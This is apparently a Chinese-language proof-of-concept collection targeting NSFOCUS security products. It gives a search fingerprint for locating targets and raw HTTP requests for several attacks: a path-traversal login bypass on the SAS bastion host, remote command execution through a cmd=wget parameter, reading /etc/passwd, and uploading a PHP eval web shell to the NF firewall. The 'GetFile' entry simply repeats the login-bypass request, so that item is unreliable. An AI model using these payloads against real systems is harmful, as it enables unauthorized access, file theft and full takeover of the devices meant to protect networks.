绿盟

目录

• 堡垒机
  • SAS堡垒机 local_user.php 任意用户登录漏洞 POC
  • SAS堡垒机 GetFile 任意文件读取漏洞 POC
  • SAS堡垒机 Exec 远程命令执行漏洞 POC
• 绿盟sas安全审计系统任意文件读取漏洞POC
• NF 下一代防火墙 任意文件上传漏洞

堡垒机

body="'/needUsbkey.php?username='"

SAS堡垒机 local_user.php 任意用户登录漏洞 POC

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Accept-Encoding: gzip, deflate

Connection: close

SAS堡垒机 GetFile 任意文件读取漏洞 POC

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

SAS堡垒机 Exec 远程命令执行漏洞 POC

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xx.xx HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

绿盟sas安全审计系统任意文件读取漏洞POC

/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd

NF 下一代防火墙 任意文件上传漏洞

POC:

POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:

--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--

POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:

cmd=phpinfo();